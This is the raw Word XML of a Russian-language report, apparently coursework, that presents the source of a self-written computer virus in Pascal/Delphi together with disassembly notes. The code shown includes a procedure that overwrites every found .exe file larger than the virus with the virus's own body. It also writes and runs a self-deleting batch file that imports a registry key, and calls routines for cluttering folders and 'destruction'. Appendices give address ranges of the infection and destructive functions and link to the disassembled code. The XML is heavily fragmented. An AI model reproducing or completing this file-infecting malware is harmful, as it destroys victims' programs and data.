          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CloseHandle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9D7762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6F6082EF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35787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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Закрытие</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787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йла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C1058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35787"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9D7762">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LStrCpy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9D7762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#0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5BF42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Инициализация переменной</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB37E5A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LStrCat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</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'@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reg</w:t>
      </w:r>
      <w:r w:rsidRPr="0043578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import</w:t>
      </w:r>
      <w:r w:rsidRPr="0043578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435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#13#10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702FD10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трока импорта ключа в реестр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B33BC1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LStrCat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</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'@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del</w:t>
      </w:r>
      <w:r w:rsidRPr="0043578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435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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reg</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#13#10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F085F5D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Строка удаления файла реестра</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3F3D30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LStrCat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>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'@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del</w:t>
      </w:r>
      <w:r w:rsidRPr="0043578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bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.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bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B427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Строка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удалени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АТ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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ника</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0A105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o SizeOf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(Buf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6BE30F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Buf[i]=#7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5B1DB9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68EF4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Определен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зиции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вершюшего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имвола</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B18E68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f:=CreateFile(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bat.bat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GENERIC_WRITE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CREATE_ALWAYS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B0E40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Открытие с созданием файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C29B05F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WriteFile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CRD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16600AB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CloseHandle(f);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8734F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winexec(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bat.bat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06D91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Запуск ВАТ-ника на исполнение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2410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RandTime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344CFC7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TrashDir;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E3EE6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Засорение папки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E52B8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1F81A2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660F7A84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Infect  предназначенна для</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC16E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заражения  с перезаписью всего файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868A7C3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8000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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найденного</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787"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435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000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процедуре</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787"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AF1D28">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F8D50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nfect(path : PChar);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212658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6CDFE6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pch : PathBuf;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A49F4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7EA6E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 :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D4E1E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Buf :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.VirSize]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EB1E6E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5FB2EB1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GetModuleFileName(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 pch, MAX_PATH);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503B06C7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Получение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ути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ебе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037FEF44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:=CreateFile(pch, GENERIC_READ, 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E0AB78D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OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 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3090BC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File(F, Buf, VirSize, B,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2D677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Чтение себя в буфер</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE6508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CloseHandle(F);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB9219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F := CreateFile(path, GENERIC_WRITE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6510A11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CREATE_ALWAYS, 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, TRUNCATE_EXISTING, FILE_ATTRIBUTE_NORMAL, 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020C8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Открытие жертвы с обнулением содержимого</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6C6CB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WriteFile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uf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VirSize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357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F1D28">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nil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58254558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CloseHandle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28E21484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35787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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Закрытие</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787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жертвы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0439D3BD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35787"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r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1D28">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VC</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397CAD9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VC=VictimCount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Halt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1C289B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64ECFB2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882D693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 Main  предназначенна для</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6EA96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организации   взаимодействия   всех</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5666CD9B" w14:textId="77777777" w:rsidR="005B1DB9" w:rsidRPr="00C90DC3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составных частей программы и являет</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EA9BAF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собой рабочий  алгоритм  программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03636364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r w:rsidRPr="004357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  <w:r w:rsidRPr="0043578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6E8AC8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72E74AD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H:=FindFirstFile(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*.exe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,R);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F0A4E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Поиск файлов по маске *.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297B3D1C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while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>H&lt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">0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14:paraId="77E42ECA" w14:textId="77777777" w:rsidR="005B1DB9" w:rsidRPr="00435787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7E3F080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357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((R.cFileName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.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(R.cFileName[</w:t>
      </w:r>
      <w:r w:rsidRPr="005B1DB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5B1DB9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'.'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(R.nFileSizeLow&gt;VirSize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E8E0E61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>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//Если не каталог и размер жертвы больше VirSize то..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA7BB3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infect(R.cFileName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F8616A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not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FindNextFile(h,R)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5B1DB9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</w:p>
    <w:p w14:paraId="47BDDBC0" w14:textId="77777777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5B1DB9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8000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//Поиск следующего файла, если файл не найден - выход из цикла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A43016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0AD5A5F2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4BE23F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33609C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90DEC5B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B1DB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Основная</w:t>
      </w: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часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163134EE" w14:textId="77777777" w:rsidR="005B1DB9" w:rsidRP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DB9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>Dectruction;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C84814" w14:textId="0AD62420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Main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5434A2FC" w14:textId="025D82B4" w:rsidR="005B1DB9" w:rsidRDefault="005B1DB9" w:rsidP="005B1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B1DB9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57985471" w14:textId="79A35A8F" w:rsidR="00DD55D1" w:rsidRDefault="003C61CB" w:rsidP="00665754">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD020E" w14:textId="71FA02EA" w:rsidR="003C61CB" w:rsidRDefault="00C90DC3" w:rsidP="00F13FD7">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C90DC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52BF86AC" wp14:editId="3735AAEC">
            <wp:extent cx="5196518" cy="893477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697" cy="89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F6A" w14:textId="191ED871" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F621CD9" w14:textId="7C3AB849" w:rsidR="00665754" w:rsidRDefault="00665754" w:rsidP="00665754">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00665754">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20410A1E" wp14:editId="3E158B22">
            <wp:extent cx="6300470" cy="642810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902" w14:textId="667FD442" w:rsidR="00E978AE" w:rsidRDefault="00E978AE" w:rsidP="00E978AE">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Приложение 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FEDB71" w14:textId="041FFA99" w:rsidR="00E978AE" w:rsidRDefault="006A3B88" w:rsidP="00E978AE">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Тело вируса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DD60D9" w14:textId="01069FF9" w:rsidR="006A3B88" w:rsidRPr="006A3B88" w:rsidRDefault="006A3B88" w:rsidP="006A3B88">
      <w:r>
        <w:t>Располагается</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 00406</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C18 – 00408DF8</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E728A63" w14:textId="310C90B2" w:rsidR="006A3B88" w:rsidRDefault="006A3B88" w:rsidP="006A3B88">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Проверка сигнатуры вируса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17C917" w14:textId="7633C030" w:rsidR="006A3B88" w:rsidRDefault="006A3B88" w:rsidP="006A3B88">
      <w:r>
        <w:t xml:space="preserve">Располагается: </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B88">
        <w:t>00404250</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B88">
        <w:t>0040436C</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A60DC23" w14:textId="18086A86" w:rsidR="006A3B88" w:rsidRDefault="006A3B88" w:rsidP="006A3B88">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Заражение и деструктивные функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EB4750" w14:textId="7A988FC7" w:rsidR="006A3B88" w:rsidRDefault="006A3B88" w:rsidP="006A3B88">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Располагается: </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B88">
        <w:t>00408E00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="006A3B88">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0040A81A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D0AC78" w14:textId="3B8E2188" w:rsidR="006A3B88" w:rsidRDefault="006A3B88" w:rsidP="006A3B88">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Передача управления </w:t>
      </w:r>
      <w:r w:rsidR="00545573">
        <w:t>программе-носителю</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0020305D" w14:textId="5B960D4D" w:rsidR="00545573" w:rsidRDefault="00545573" w:rsidP="00545573">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Располагается: </w:t>
      </w:r>
      <w:r w:rsidRPr="00545573">
        <w:t>00406C54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00545573">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>00406C79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26892881" w14:textId="07D0435E" w:rsidR="00545573" w:rsidRPr="00545573" w:rsidRDefault="00545573" w:rsidP="00545573">
      <w:r>
        <w:t xml:space="preserve">Дизассемблированный код можно найти здесь: </w:t>
      </w:r>
      <w:r w:rsidRPr="00545573">
        <w:t>https://drive.google.com/file/d/18iAm-2SjRKbc1XxpMW5ji34gQH5xneXc/view?usp=drive_link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065FEE1" w14:textId="01BB5397" w:rsidR="00E978AE" w:rsidRPr="00545573" w:rsidRDefault="00E978AE" w:rsidP="00E978AE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="542065DB" w14:textId="77777777" w:rsidR="00F35C96" w:rsidRPr="006A3B88" w:rsidRDefault="00F35C96" w:rsidP="00E978AE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD51A95" w14:textId="77777777" w:rsidR="00F35C96" w:rsidRPr="00545573" w:rsidRDefault="00F35C96" w:rsidP="00E978AE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7EB8BE" w14:textId="33267C6B" w:rsidR="00E978AE" w:rsidRPr="00E978AE" w:rsidRDefault="00E978AE" w:rsidP="00E978AE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E978AE" w:rsidRPr="00E978AE" w:rsidSect="00D60F71">
      <w:footerReference w:type="default" r:id="rId3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90F1" w14:textId="77777777" w:rsidR="00E033D2" w:rsidRPr="00D60F71" w:rsidRDefault="00E033D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C5BB0E8" w14:textId="77777777" w:rsidR="00E033D2" w:rsidRPr="00D60F71" w:rsidRDefault="00E033D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00DD" w14:textId="77777777" w:rsidR="00E033D2" w:rsidRPr="00D60F71" w:rsidRDefault="00E033D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8AB8BCC" w14:textId="77777777" w:rsidR="00E033D2" w:rsidRPr="00D60F71" w:rsidRDefault="00E033D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8F4F01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F62D69A"/>
    <w:lvl w:ilvl="0" w:tplc="17E88B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B068A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00C2497C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23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02ECE"/>
    <w:rsid w:val="00014CDB"/>
    <w:rsid w:val="00021F83"/>
    <w:rsid w:val="00027724"/>
    <w:rsid w:val="00032426"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="00036B43"/>
    <w:rsid w:val="00037B6A"/>
    <w:rsid w:val="00042302"/>
    <w:rsid w:val="000449CC"/>
    <w:rsid w:val="00046E5E"/>
    <w:rsid w:val="00051B1F"/>
    <w:rsid w:val="00052897"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="00087219"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="0009414C"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000B7289"/>
    <w:rsid w:val="000C2C25"/>
    <w:rsid w:val="000D6252"/>
    <w:rsid w:val="000D6CC6"/>
    <w:rsid w:val="000E053D"/>
    <w:rsid w:val="000E0BEF"/>
    <w:rsid w:val="000E77B1"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="00115267"/>
    <w:rsid w:val="001221B6"/>
    <w:rsid w:val="00141F4A"/>
    <w:rsid w:val="00142E5D"/>
    <w:rsid w:val="00144A08"/>
    <w:rsid w:val="00145D4B"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="00193F40"/>
    <w:rsid w:val="001A5A72"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001B3B42"/>
    <w:rsid w:val="001C4F37"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="00205A56"/>
    <w:rsid w:val="002359F2"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="002669A3"/>
    <w:rsid w:val="002C106B"/>
    <w:rsid w:val="002C33FF"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E5217"/>
    <w:rsid w:val="002E53F7"/>
    <w:rsid w:val="002E7750"/>
    <w:rsid w:val="002F0C40"/>
    <w:rsid w:val="002F575E"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="003228E4"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="0035379A"/>
    <w:rsid w:val="00361E20"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="0039450A"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003A6A81"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003C30BA"/>
    <w:rsid w:val="003C61CB"/>
    <w:rsid w:val="003C7914"/>
    <w:rsid w:val="003D0AD7"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="00410477"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="00422A78"/>
    <w:rsid w:val="00423EF4"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00433A34"/>
    <w:rsid w:val="00435787"/>
    <w:rsid w:val="00454292"/>
    <w:rsid w:val="00466C09"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004C36AC"/>
    <w:rsid w:val="004E49C8"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="005071E4"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00543F95"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="00545573"/>
    <w:rsid w:val="005467ED"/>
    <w:rsid w:val="005536EF"/>
    <w:rsid w:val="005A7260"/>
    <w:rsid w:val="005B1DB9"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D3A67"/>
    <w:rsid w:val="005E1303"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005E6638"/>
    <w:rsid w:val="005F5D88"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="00602693"/>
    <w:rsid w:val="00610558"/>
    <w:rsid w:val="00620A6B"/>
    <w:rsid w:val="00621BCC"/>
    <w:rsid w:val="00624AF5"/>
    <w:rsid w:val="00646EA0"/>
    <w:rsid w:val="00665754"/>
    <w:rsid w:val="00671283"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="0068384B"/>
    <w:rsid w:val="006A3B88"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006C6A1B"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006D5490"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="00713756"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="00730620"/>
    <w:rsid w:val="00746292"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="007674C3"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="00775163"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="00785012"/>
    <w:rsid w:val="007B51A1"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D1C02"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007D421F"/>
    <w:rsid w:val="007F3461"/>
    <w:rsid w:val="00801608"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="00866420"/>
    <w:rsid w:val="00881E00"/>
    <w:rsid w:val="00893C5B"/>
    <w:rsid w:val="008B1C72"/>
    <w:rsid w:val="008D0AB9"/>
    <w:rsid w:val="008D4BA8"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008E0D6A"/>
    <w:rsid w:val="008E7DD0"/>
    <w:rsid w:val="0090469C"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="0093440A"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="00951EEB"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="009876AC"/>
    <w:rsid w:val="00990A17"/>
    <w:rsid w:val="00996356"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009C10DB"/>
    <w:rsid w:val="009C3EB6"/>
    <w:rsid w:val="009C742E"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009D7762"/>
